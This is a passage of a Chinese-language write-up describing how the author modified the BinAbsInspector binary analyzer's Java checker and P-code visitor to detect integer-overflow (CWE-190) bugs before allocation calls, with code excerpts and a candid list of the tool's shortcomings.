                + "can produce an integer overflow or wraparound, when the logic assumes that the resulting value "
                + "will always be larger than the original value. This can introduce other weaknesses "
                + "when the calculation is used for resource management or execution control.";
    }

    private boolean checkCodeBlock(CodeBlock codeBlock, Reference ref) {
        boolean foundWrapAround = false;
        for (Address address : codeBlock.getAddresses(true)) {
            Instruction instruction = GlobalState.flatAPI.getInstructionAt(address);
            if (instruction == null) {
                continue;
            }
            for (PcodeOp pCode : instruction.getPcode(true)) {
                if (pCode.getOpcode() == PcodeOp.INT_LEFT || pCode.getOpcode() == PcodeOp.INT_MULT) {
                    foundWrapAround = true;
                }
                if (pCode.getOpcode() == PcodeOp.CALL && foundWrapAround && pCode.getInput(0).getAddress()
                        .equals(ref.getToAddress())) {
                    CWEReport report = getNewReport(
                            "(Integer Overflow or Wraparound) Potential overflow "
                                    + "due to multiplication before call to malloc").setAddress(
                            Utils.getAddress(pCode));
                    Logging.report(report);
                    return true;
                }
            }
        }
        return false;
    }

    @Override
    public boolean check() {
        boolean hasWarning = false;
        try {
            BasicBlockModel basicBlockModel = new BasicBlockModel(GlobalState.currentProgram);
            for (Reference reference : Utils.getReferences(new ArrayList<>(interestingSymbols))) {
                Logging.debug(reference.getFromAddress() + "->" + reference.getToAddress());
                for (CodeBlock codeBlock : basicBlockModel.getCodeBlocksContaining(reference.getFromAddress(),
                        TaskMonitor.DUMMY)) {
                    hasWarning |= checkCodeBlock(codeBlock, reference);
                }
            }
        } catch (Exception exception) {
            exception.printStackTrace();
        }
        return hasWarning;
    }
}

可以发现这个模块就是直接遍历 Reference 所在 BasicBlock 的指令流,判断是否有潜在的整数溢出运算指令,在此基础上检查是否遇到了调用 Sink 函数的 Call 指令,条件满足则输出。这样会导致肉眼可见的误报。

最终,基于 BinAbsInspector 框架,我们构思了以下的实现思路来实现整数溢出漏洞检测:

image-20221211054048264

  • 核心就是 PcodeVisitorChecker 上的改动:

    • PcodeVisitor 负责完成潜在整数溢出指令的标记
    • Checker 负责检查 Sink 处的函数调用参数,以确认其是否受到了被标记指令的影响
    • 这里暂时没有实现 Source 的约束,即使框架本身已经提供了 TaintMap 去回溯指令的 Source 函数,主要考虑是避免不小心整出更多 BUG 导致跑不出有分数的答案交上去...

3.3 实现

不太擅长写 Java,写得蠢的地方不要见怪

3.3.1 修改 CWE190 Checker

3.3.1.1 查找到足够的 Sink

在 Checker 模块添加自定义 Sink,并实现扫描程序 Symbol Table 自动提取 Sink 的功能(就是一暴力枚举):

SymbolTable symbolTable = GlobalState.currentProgram.getSymbolTable();
SymbolIterator si = symbolTable.getSymbolIterator();
...
while (si.hasNext()) {
    Symbol s = si.next();
    if ((s.getSymbolType() == SymbolType.FUNCTION) && (!s.isExternal()) && (!isSymbolThunk(s))) {
        for(Reference reference: s.getReferences()){
            Logging.debug(s.getName() + ":" + reference.getFromAddress() + "->" + reference.getToAddress());
            hasWarning |= checkCodeBlock(reference, s.getName());
            }
        }
    }
...

这里首先从符号表提取出所有符号,然后过滤出函数符号,过滤掉 External 符号,过滤掉 Thunk 符号剩下来的作为 Sink。其实这样的过滤还是太粗略的,可以大致总结一些基本不可能成为 Sink 但是又高频使用的常见函数构成黑名单,提取 Sink 时从中过滤一下实测效果会好很多。

3.3.1.2 使用 High-Pcode

不再直接遍历 CodeBlock 中的 Instruction,因为这样使用的是 Raw-Pcode。与 Raw-Pcode 相对应的是 High-Pcode。Raw-Pcode 只是将返汇编指令直接抽象出来得到中间的表示方式,它的 CALL 指令无法表示函数调用的参数信息。而 High-Pcode 是经过 AST 分析后得到的,其包含的 Varnode 具有语法树上的关联关系,CALL 指令也包含了传入的参数

先获取 Sink 函数的引用点所在函数,调用 decompileFunction 进行反编译,分析函数的AST结构,并得到 High Function,由 High Function 可以获得 PcodeOpAST,PcodeOpAST 继承自 PocdeOp 类,也就是上面所说的 High-Pcode

DecompileOptions options = new DecompileOptions();
DecompInterface ifc = new DecompInterface();
ifc.setOptions(options);
// caller function
Function func = GlobalState.flatAPI.getFunctionContaining(ref.getFromAddress());
if (func == null) {
    Logging.debug("Function is null!!!");
    return false;
}      
if (!ifc.openProgram(GlobalState.currentProgram)) {
    Logging.debug("Decompiler" + "Unable to initialize: " + ifc.getLastMessage());
    return false;
}
ifc.setSimplificationStyle("decompile");
Logging.debug("Try to decompile function...");
DecompileResults res = ifc.decompileFunction(func, 3000, null);
if (res == null) {
    Logging.debug("Decompile res is null!!!");
    return false;
}    
Logging.debug("Decompile success!");   
HighFunction highFunction = res.getHighFunction();
if (highFunction == null) {
    Logging.debug("highFunction is null!!!");
    return false;
}
Iterator<PcodeOpAST> pCodeOps = highFunction.getPcodeOps();
if (pCodeOps == null) {
    Logging.debug("pCodeOps is null!!!");
    return false;
}

3.3.1.3 污点指令识别

迭代遍历函数中所有的 pCode,判断是否属于4种算数运算之一,如果是的话则检查 PcodeVisitor 是否有将该指令标记为潜在溢出指令。如果条件都符合则标记 foundWrapAround 为真,并保存最后一条潜在溢出指令地址到 lastSinkAddress

while(pCodeOps.hasNext()) {
    if(found){
        break;
    }
    pCode = pCodeOps.next();
    if (pCode.getOpcode() == PcodeOp.INT_LEFT 
        || pCode.getOpcode() == PcodeOp.INT_MULT
        || pCode.getOpcode() == PcodeOp.INT_ADD
        || pCode.getOpcode() == PcodeOp.INT_SUB) {
        if(PcodeVisitor.sink_address.contains(Utils.getAddress(pCode))){
            foundWrapAround = true;
            // get pCode's address and store it in lastSinkAddress
            lastSinkAddress = Utils.getAddress(pCode);
        } else{
            Logging.debug("sink_address set does not contain: "+String.valueOf(Utils.getAddress(pCode).getOffset()));
        }
    }
...
}
其中 PcodeVisitor.sink_address 是下文添加的一个用于保存潜在溢出指令的数据结构

3.3.1.4 CALL 指令参数检查

因为不能直接认为潜在整数溢出指令就一定会导致后续 CALL 所调用的 Sink 函数会受到整数溢出影响,所以还需要明确整数溢出的位置是否影响到了函数的参数。为了提高效率,可以只检查函数的 size 参数或者 length 参数的位置,将这些位置对应的 Varnode 的 def 地址和 lastSinkAddress 作比较来确定参数是否受到溢出影响(事实上这操作也有一些问题)。

switch(symbolName){
...
    case "calloc":
        if(pCode.getInput(1) == null && pCode.getInput(2) == null){
            Logging.debug("Input(1) & Input(2) is null!");
            break;
        }
        found = true;
        if (Utils.getAddress(pCode.getInput(1).getDef()) == lastSinkAddress
            || Utils.getAddress(pCode.getInput(2).getDef()) == lastSinkAddress) {
            found = true;
        }
        break;                        
    case "realloc":
        if(pCode.getInput(2) == null){
            Logging.debug("Input(2) is null!");
            break;
        }
        found = true;
        if (Utils.getAddress(pCode.getInput(2).getDef()) == lastSinkAddress) {
            found = true;
        }
        break;
...
}

3.3.2 修改 PcodeVisitor

这个模块主要完成符号执行的功能,如果某条指令发生了潜在的整数溢出可以通过 Kset 的 isTop() 方法来检查

3.3.2.1 标记潜在整数溢出指令

添加一个 public 的静态 HashSet 变量,用于保存那些被符号执行认为存在潜在整数溢出的指令

public static HashSet<Address> sink_address = new HashSet<Address>();

3.3.2.2 检查四种运算指令的整数溢出

在 PcodeVisitor 对之前提到的四种运算指令进行符号执行时,通过 isTop() 检查 Pcode 的两个 Input Varnode 和一个 Output Varnode 对应的符号值是否存在潜在的整数溢出,如果有则标记到 HashSet<Address> sink_address 中以便 Checker 访问

public void visit_INT_MULT(PcodeOp pcode, AbsEnv inOutEnv, AbsEnv tmpEnv) {
    Varnode op1 = pcode.getInput(0);
    Varnode op2 = pcode.getInput(1);
    Varnode dst = pcode.getOutput();

    KSet op1KSet = getKSet(op1, inOutEnv, tmpEnv, pcode);
    KSet op2KSet = getKSet(op2, inOutEnv, tmpEnv, pcode);
    KSet resKSet = op1KSet.mult(op2KSet);
    setKSet(dst, resKSet, inOutEnv, tmpEnv, true);
    updateLocalSize(dst, resKSet);
    // CWE190: Integer Overflow
    if (resKSet.isTop() || op1KSet.isTop() || op2KSet.isTop()) {
        Logging.debug("Add new sink address: "+String.valueOf(Utils.getAddress(pcode).getOffset()));
        sink_address.add(Utils.getAddress(pcode));
    }
    IntegerOverflowUnderflow.checkTaint(op1KSet, op2KSet, pcode, true);
}

3.3.3 运行效果

image-20221211051811333

3.4 不足与改进

  1. [漏报] 不明原因导致的大量漏报,目前该BUG暂未解决,发现问题主要出在 CWE190 Checker 在判断运算指令是否被标记为潜在溢出指令时存在漏判的情况
  2. [漏报] 一个设计失误,由于时间比较仓促,在实现 Checker 的时候只把函数参数的 def 地址和 lastSinkAddress 做了比较,导致如果在 CALL 之前出现多个潜在溢出指令时,可能会无法匹配到正确的那条指令,这也会导致大量的漏报情况
  3. [资源占用] 资源占用特别大,由于该方案存在大量符号执行和约束求解,使用个人笔记本电脑实验时发生了多次卡死,测试进度缓慢